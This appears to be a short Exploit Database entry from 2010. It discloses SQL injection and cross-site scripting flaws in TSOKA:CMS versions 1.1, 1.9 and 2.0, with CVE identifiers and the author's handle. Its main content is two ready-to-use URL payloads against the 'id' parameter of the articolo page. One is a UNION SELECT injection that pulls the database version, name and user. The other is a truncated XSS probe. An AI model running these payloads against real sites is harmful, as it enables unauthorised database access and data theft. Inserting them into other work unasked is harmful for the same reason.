TSOKA:CMS 1.1/1.9/2.0 - SQL Injection / Cross-Site Scripting

Author: d3v1l
type: webapps
platform: php
port: 
date_added: 2010-03-27  
date_updated:   
verified: 1  
codes: OSVDB-66259;CVE-2010-2675;CVE-2010-2674;OSVDB-63277  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 11923.txt  
[~]-----------------------------------------------------------------------------------------------------------------------
[~] TSOKA:CMS v1.1 , v1.9 AND v2.0 SQL Injection & XSS Vulnerability
[~]
[~] http://www.alanzard.com (from italy)
[~]
[~]
[~] ----------------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 28.03.2010
[~]
[~]
[~] http://security-sh3ll.blogspot.com
[~]
[~] ----------------------------------------------------------------------------------------------------------------------
[~] articolo&id= SQL & XSS
[~]
[~]
[~] Ex -
[~]
[~] http://[site]/?pag=articolo&id=">
[~] http://[site]/?pag=articolo&id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8--
[~]------------------------------------------------------------------------------------------------------------------------